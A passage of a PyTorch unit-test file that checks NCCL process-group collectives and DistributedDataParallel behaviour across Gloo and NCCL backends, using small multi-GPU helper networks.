self.file = tempfile.NamedTemporaryFile(delete=False)
self.num_gpus = torch.cuda.device_count()
if self.num_gpus > 0:
raise unittest.SkipTest("GPUs are available, skipping test")
def tearDown(self):
pass
@requires_nccl()
def test_init_no_gpus(self):
store = c10d.FileStore(self.file.name, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "ProcessGroupNCCL is only supported with GPUs, no GPUs found!"
):
c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
@unittest.skipIf(
TEST_WITH_TSAN,
"TSAN is not fork-safe since we're forking in a multi-threaded environment",
)
class ProcessGroupNCCLTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
self.num_gpus = torch.cuda.device_count()
if self.num_gpus < 2:
raise unittest.SkipTest("NCCL test requires 2+ GPUs")
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING, so setting the latter
# here does not interfere with tests that rely on NCCL_BLOCKING_WAIT.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
def tearDown(self):
pass
@requires_nccl()
def test_empty_tensors(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
xs = [torch.cuda.FloatTensor([])]
pg.broadcast(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.allreduce(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.reduce(xs).wait()
self.assertEqual(0, xs[0].numel())
ys = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.allgather(ys, xs).wait()
for y in ys[0]:
self.assertEqual(0, y.numel())
ys = [torch.cuda.FloatTensor([])]
xs = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.reduce_scatter(ys, xs).wait()
self.assertEqual(0, ys[0].numel())
@requires_nccl()
def test_broadcast_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def broadcast(xs, rootRank, rootTensor):
opts = c10d.BroadcastOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
work = pg.broadcast(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
broadcast(tensors, self.rank, rt)
for i in range(self.num_gpus):
self.assertEqual(tensors[i], tensors[rt])
@requires_nccl()
def test_allreduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors, op):
opts = c10d.AllreduceOptions()
opts.reduceOp = op
work = pg.allreduce(tensors, opts)
work.wait()
# Sum
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.SUM)
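# world_size is 1 here, so the allreduce sums the num_gpus local tensors
# 1..num_gpus and every entry becomes num_gpus * (num_gpus + 1) / 2.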
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[i],
)
# Product
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(math.factorial(self.num_gpus))]), tensors[i]
)
# Min
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([1.0]), tensors[i])
# Max
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
self.assertEqual(torch.tensor([self.num_gpus]), tensors[i])
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
allreduce(tensors, op)
@requires_nccl()
def test_reduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce(xs, rootRank, rootTensor, op=None):
opts = c10d.ReduceOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
if op:
opts.reduceOp = op
work = pg.reduce(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
reduce(tensors, self.rank, rt)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[rt],
)
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
reduce(tensors, self.rank, rt, op)
@requires_nccl()
def test_allgather_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather(output_ts, input_ts):
work = pg.allgather(output_ts, input_ts)
work.wait()
tensors = []
output_ts = [[] for _ in range(self.num_gpus)]
for idx, ls in enumerate(output_ts):
for _ in range(self.world_size * self.num_gpus):
ls.append(torch.tensor([0]).cuda(idx))
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
allgather(output_ts, tensors)
# Verification
for device_ts in output_ts:
for s_idx, t in enumerate(device_ts):
self.assertEqual(torch.tensor([s_idx]), t)
@requires_nccl()
def test_reduce_scatter_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter(outputs, input_lists, op):
opts = c10d.ReduceScatterOptions()
opts.reduceOp = op
work = pg.reduce_scatter(outputs, input_lists, opts)
work.wait()
virtual_rank = self.rank * self.world_size
virtual_world_size = self.num_gpus * self.world_size
output = [torch.tensor([0]).cuda(i) for i in range(self.num_gpus)]
# With world_size == 1 each GPU acts as a virtual rank: GPU i's input list
# holds the values i + j for j in [0, virtual_world_size), where entry j is
# the contribution destined for virtual rank j.
# Sum
tensor_lists = [
[
torch.tensor([self.rank * self.num_gpus + i + j]).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.SUM)
for i in range(self.num_gpus):
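# With world_size == 1 (so rank == 0), output i is the sum over GPUs k of
# (k + i), i.e. num_gpus * (num_gpus - 1) / 2 + i * num_gpus, which matches
# the expected formula below.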
expected = torch.tensor(
[
float(self.num_gpus * (self.num_gpus - 1) / 2)
+ (virtual_rank + i) * virtual_world_size
]
)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
# Min
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
expected = torch.tensor([self.rank * self.world_size + i])
self.assertEqual(expected, output[i])
# Max
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
expected = torch.tensor(
[self.rank * self.world_size + i + virtual_world_size - 1]
)
self.assertEqual(expected, output[i])
# Product
tensor_lists = [
[
torch.tensor(
[(self.rank * self.num_gpus + i + j) % virtual_world_size + 1]
).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
expected = torch.tensor([float(math.factorial(virtual_world_size))])
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
@requires_nccl()
def test_barrier(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors):
opts = c10d.AllreduceOptions()
work = pg.allreduce(tensors, opts)
return work
# Create collectives that operate on 2, 3, ..., self.num_gpus GPUs respectively
tensors_list = [[] for _ in range(2, self.num_gpus + 1)]
for i in range(2, self.num_gpus + 1):
for j in range(i):
tensors_list[i - 2].append(torch.tensor([j + 1]).cuda(j))
works = []
for tensors in tensors_list:
work = allreduce(tensors)
works.append(work)
# Barrier will ensure that all previous work is completed
pg.barrier().wait()
for i in range(2, self.num_gpus + 1):
for j in range(i):
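# The collective over i GPUs reduced the values 1..i, so every entry
# should equal i * (i + 1) / 2.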
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(i * (i + 1) / 2)]), tensors_list[i - 2][j]
)
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 50, bias=False)
self.fc3 = nn.Linear(50, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
x = self.fc3(x)
return F.softmax(x, dim=1)
class DoubleGpuNet(nn.Module):
def __init__(self, gpus):
super(DoubleGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[1])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.fc3(x)
return F.softmax(x, dim=1).to(dev0)
class QuadraGpuNet(nn.Module):
def __init__(self, gpus):
super(QuadraGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[2])
self.fc4 = nn.Linear(4, 4, bias=False).to(gpus[3])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
dev2 = self.fc3.weight.device
dev3 = self.fc4.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.relu(self.fc3(x.to(dev2)))
x = self.fc4(x.to(dev3))
return F.softmax(x, dim=1).to(dev0)
class ConvNet(nn.Module):
def __init__(self, gpus, layouts, dtypes):
super(ConvNet, self).__init__()
self.dtypes = dtypes
if isinstance(gpus, list):
self.layer_gpus = gpus
else:
gpus = [gpus] * 4
self.conv0 = torch.nn.Conv2d(8, 16, (2, 2)).to(
device=gpus[0], memory_format=layouts[0], dtype=dtypes[0]
)
self.conv1 = torch.nn.Conv2d(16, 32, (2, 2)).to(
device=gpus[1], memory_format=layouts[1], dtype=dtypes[1]
)
self.conv2 = torch.nn.Conv2d(32, 16, (2, 2)).to(
device=gpus[2], memory_format=layouts[2], dtype=dtypes[2]
)
self.conv3 = torch.nn.Conv2d(16, 8, (2, 2)).to(
device=gpus[3], memory_format=layouts[3], dtype=dtypes[3]
)
def forward(self, x):
x = x.to(self.dtypes[0])
# Could say
# x = self.conv0(x).to(device=self.conv1.weight.device, dtype=self.dtypes[1])
# etc. But I don't want to appeal to the weights' devices directly, because part of this test's purpose
# is to verify weights are where expected if the model gets replicated.
gpus = self.layer_gpus if hasattr(self, "layer_gpus") else [x.device] * 4
x = self.conv0(x).to(device=gpus[1], dtype=self.dtypes[1])
x = self.conv1(x).to(device=gpus[2], dtype=self.dtypes[2])
x = self.conv2(x).to(device=gpus[3], dtype=self.dtypes[3])
return self.conv3(x)
class Task(nn.Module):
def __init__(self):
super().__init__()
self.p = nn.Parameter(torch.ones(2, 2))
def forward(self, x):
return self.p + x
class ModuleForDdpCommHook(nn.Module):
def __init__(self):
super().__init__()
self.t0 = Task()
def forward(self, x, rank):
return self.t0(x + rank)
class SparseGradientModule(nn.Module):
def __init__(self):
super(SparseGradientModule, self).__init__()
self.embedding = nn.EmbeddingBag(10, 10, sparse=True)
def forward(self, x):
return F.softmax(self.embedding(x), dim=1)
@unittest.skipIf(
TEST_WITH_TSAN,
"TSAN is not fork-safe since we're forking in a multi-threaded environment",
)
class DistributedDataParallelTest(MultiProcessTestCase):
def setUp(self):
super(DistributedDataParallelTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING, so setting the latter
# here does not interfere with tests that rely on NCCL_BLOCKING_WAIT.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
if sys.platform == "win32":
self._spawn_processes()
else:
self._fork_processes()
def tearDown(self):
# The DistributedDataParallel tests don't seem to trigger the FileStore destructor.
# TODO: investigate why; this test is known to have issues.
# Work around it by removing the file manually.
try:
os.remove(self.file_name)
except OSError:
pass
@property
def world_size(self):
return 2
def _prepare_single_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
model = Net()
device = devices[0] if devices else torch.device("cuda:%d" % self.rank)
ddp_model = DistributedDataParallel(
copy.deepcopy(model).to(device),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
model.to(device)
input = torch.randn(global_batch_size, 2).to(device)
target = torch.randn(global_batch_size, 4).to(device)
return model, ddp_model, input, target
def _prepare_multi_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
self.assertTrue(
len(devices) == 2 or len(devices) == 4,
"unexpected devices for ddp tests {}".format(devices),
)
if len(devices) == 2:
model = DoubleGpuNet(devices)
elif len(devices) == 4:
model = QuadraGpuNet(devices)
ddp_model = DistributedDataParallel(
copy.deepcopy(model),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
input = torch.randn(global_batch_size, 2).cuda(devices[0])
target = torch.randn(global_batch_size, 4)
return model, ddp_model, input, target
def _test_ddp_with_process_group(
self,
process_group,
devices,
device_ids,
multi_device=False,
gradient_as_bucket_view=False,
):
"""
Note: we pass down `device_ids` all the way to DistributedDataParallel
as part of the test. Below you find tests that either use a list of
integers, a list of `torch.device` instances, or an empty list.
The `devices` argument is used to control placement of the model and
must always be specified as a list of `torch.device` instances.
"""
local_batch_size = 1 if devices is None else len(devices)
global_batch_size = self.world_size * local_batch_size
if multi_device:
model, ddp_model, input, target = self._prepare_multi_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model.get_ddp_logging_data()
self.assertTrue(ddp_logging_data.is_multi_device_module)
else:
model, ddp_model, input, target = self._prepare_single_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model.get_ddp_logging_data()
self.assertFalse(ddp_logging_data.is_multi_device_module)
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
def update_parameters(model):
for param in model.parameters():
with torch.no_grad():
param -= param.grad
param.grad = None
# check two model parameters over 2 iterations
for iteration in range(2):
# single cpu/gpu training
step_model(model, input, target)
# DDP training; each rank trains on its shard of the global batch
step_model(
ddp_model,
input[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
target[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
)
# Update weights and run a second iteration to shake out errors
update_parameters(model)
update_parameters(ddp_model)
self.assertEqual(
len(list(model.parameters())), len(list(ddp_model.parameters()))
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertEqual(i, j)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
def _test_gloo_backend(
self, devices, device_ids, multi_device=False, gradient_as_bucket_view=False
):
store = c10d.FileStore(self.file_name, self.world_size)
options = c10d.ProcessGroupGloo.Options()
options._devices = [create_device(interface=LOOPBACK)]
process_group = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, options
)
self._test_ddp_with_process_group(
process_group, devices, device_ids, multi_device, gradient_as_bucket_view
)
@requires_gloo()
def test_gloo_backend_cpu_module(self):
self._test_gloo_backend([torch.device("cpu")], None)
@requires_gloo()
def test_gloo_backend_cpu_module_grad_is_view(self):
self._test_gloo_backend([torch.device("cpu")], None, gradient_as_bucket_view=True)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_gloo_backend_1gpu_module_device_ids_integer_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_gloo_backend(devices, int_devices)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_gloo_backend_1gpu_module_device_ids_torch_device_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_gloo_backend(devices, devices)
@requires_gloo()
@skip_if_lt_x_gpu(4)
def test_gloo_backend_2gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_gloo_backend(devices, None, multi_device=True)
@requires_gloo()
@skip_if_lt_x_gpu(8)
def test_gloo_backend_4gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:4]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_gloo_backend(devices, None, multi_device=True)
def _test_nccl_backend(
self, devices, device_ids, multi_device=False, gradient_as_bucket_view=False
):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
self._test_ddp_with_process_group(
process_group, devices, device_ids, multi_device, gradient_as_bucket_view
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_multi_device_ids_not_allowed(self):
int_devices = list(range(torch.cuda.device_count()))
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
with self.assertRaisesRegex(ValueError, "device_ids can only be None or contain a single element."):
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_device_ids_None(self):
self._test_nccl_backend(None, None)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_empty_device_ids(self):
# This tests the backward compatibility of accepting an empty list as `device_ids`,
# although we no longer document this in favor of the default value of `None`,
# which is consistent with multi-device modules and CPU modules.
self._test_nccl_backend(None, [])
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_multi_device_module_device_ids_None(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_integer_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_torch_device_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, devices)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_2gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(8)
def test_nccl_backend_4gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:4]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_ddp_multi_device_module_config(self):
gpus = gpus_for_rank(self.world_size)[self.rank]
self.assertTrue(len(gpus) >= 2, "expecting at least 2 gpus per process")
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus[:2]
model = DoubleGpuNet(gpus)
with self.assertRaisesRegex(
ValueError,
"DistributedDataParallel device_ids and output_device arguments only work with "
"single-device/multiple-device GPU modules or CPU modules",
):
ddp_model = DistributedDataParallel(
model, output_device=gpus[1], process_group=process_group
)
with self.assertRaisesRegex(ValueError, "device_ids can only be None or contain a single element."):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
with self.assertRaisesRegex(
ValueError, "input module must be on the same type of devices"
):
model.fc1 = model.fc1.cpu()
ddp_model = DistributedDataParallel(model, process_group=process_group)
model = model.cpu()
with self.assertRaisesRegex(ValueError, "device_ids can only be None or contain a single element."):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
def _test_fp16(self, gradient_as_bucket_view=False):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus_for_rank(self.world_size)[self.rank]
model = nn.Linear(1, 1, bias=False).cuda(gpus[0]).half()
nn.init.constant_(model.weight, 1)
ddp_model = DistributedDataParallel(
model,
device_ids=[gpus[0]],
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Input 2**15, so that the gradients will overflow with a
# world_size of 2, unless we normalize the gradient by the
# world_size before the reduction
input = torch.tensor([[2 ** 15]]).cuda(gpus[0]).half()
# Step model
ddp_model.train()
output = ddp_model(input)
loss = output.sum()
loss.backward()
self.assertFalse(any(torch.isinf(p.grad).any() for p in ddp_model.parameters()))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16(self):
self._test_fp16()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_grad_is_view(self):
self._test_fp16(gradient_as_bucket_view=True)
def _test_arbitrary_forward_return_value(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class ForwardReturnValueModule(nn.Module):
def __init__(self):
super(ForwardReturnValueModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x, fn):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# The first softmax does NOT include fc3 in its autograd graph
# whereas the second softmax DOES. If we pass only the first
# tensor we see in the output to the reducer, it marks the
# gradient for fc3 as ready (because it doesn't show up). If
# downstream uses of this return value choose to differentiate
# against the second output tensor, it would still receive a
# gradient and a callback for this tensor, resulting in a crash.
return fn(
F.softmax(x, dim=1),
F.softmax(self.fc3(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
ForwardReturnValueModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Always run "backward" to ensure the reducer is called by autograd.
# If we don't correctly capture the output tensors from the return value,
# the reducer won't see a hook for the unused parameter, and will throw an error.
# The correct capture is what we're testing in this function.
def test(box, unbox):
output = model(input, fn=box)
loss = criterion(unbox(output), target)
loss.backward()
# Test with identity return value
test(
box=lambda x, y: (x, y),
unbox=lambda obj: obj[1],
)
# Test with list return value
test(
box=lambda x, y: ["foo", x, "bar", y],
unbox=lambda obj: obj[3],
)
# Test with tuple return value
test(
box=lambda x, y: ("foo", x, "bar", y),
unbox=lambda obj: obj[3],
)
# Test with dict return value
test(
box=lambda x, y: {"foo": "bar", "a": x, "b": y},
unbox=lambda obj: obj["b"],
)
# Test with list with dict return value
test(
box=lambda x, y: ["foo", "bar", {"a": x, "b": y}],
unbox=lambda obj: obj[2]["b"],
)
# Test with dict with list return value
test(
box=lambda x, y: {"foo": "bar", "list": [0, x, 1, y]},
unbox=lambda obj: obj["list"][3],
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value(self):
self._test_arbitrary_forward_return_value()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value_grad_is_view(self):
self._test_arbitrary_forward_return_value(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_with_lazy_parameters(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Modules with uninitialized parameters"
):
DistributedDataParallel(
torch.nn.LazyLinear(10), process_group=process_group
)
def _test_find_unused_parameters_kwarg(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
torch.cuda.set_device(self.rank)
dist.init_process_group(
backend="nccl",
world_size=self.world_size,
rank=self.rank,
init_method=f"file://{self.file_name}"
)
process_group = c10d.distributed_c10d._get_default_group()
class FindUnusedParametersModule(nn.Module):
def __init__(self):
super(FindUnusedParametersModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# Return the fc3 module so that the caller can invoke it
# outside of the forward function. While this is bad practice,
# we can use it to trigger a reducer error.
return (F.softmax(x, dim=1), self.fc3)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
ddp_model = None
def test_find_unused_parameters(
find_unused_parameters, test_default=False, gradient_as_bucket_view=False
):
if test_default:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
else:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
find_unused_parameters=find_unused_parameters,
gradient_as_bucket_view=gradient_as_bucket_view,
)
nonlocal ddp_model
ddp_model = model
output, fc3 = model(input)
output = fc3(output)
loss = criterion(output, target)
loss.backward()
# First, test that finding unused params under these conditions triggers an
# error when `backward` is called (because fc3 is an unused parameter and
# will therefore be marked ready twice).
try:
test_find_unused_parameters(
True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.assertTrue(
str(ex).startswith(
"Expected to mark a variable ready only once.",
)
)
unused_index = 2
unused_index_str = f"Parameter at index {unused_index}"
model = ddp_model.module
for module_name, module in model.named_modules():
if module == model.fc3:
for parameter_name, _ in module.named_parameters(
recurse=False
):
unused_fqn = f"{module_name}.{parameter_name}"
# Only one such parameter in model.fc3, since bias=False
break
if dist._get_debug_mode() != dist._DistributedDebugLevel.OFF:
unused_index_str += f" with name {unused_fqn}"
self.assertTrue(unused_index_str in str(ex))
else:
self.fail("Expected exception")
dist.barrier(process_group)
# Then test that the default behavior can be overridden by setting
# `find_unused_parameters=False`.
try:
test_find_unused_parameters(
False, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
# Test that find_unused_parameters defaults to False when not passed explicitly
try:
test_find_unused_parameters(
True, test_default=True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
# TODO: Combine the following tests once https://github.com/pytorch/pytorch/issues/55967
# is resolved.
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["DETAIL"])
def test_find_unused_parameters_kwarg_debug_detail(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["INFO"])
def test_find_unused_parameters_kwarg_debug_info(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["OFF"])
def test_find_unused_parameters_kwarg_debug_off(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["DETAIL"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_detail(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["INFO"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_info(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["OFF"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_off(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
def _test_global_local_unused_params_grad(self, gradient_as_bucket_view=False):
"""
By simulating multi-task training, this test makes sure that:
1) DDP does not touch the grad of globally unused parameters.
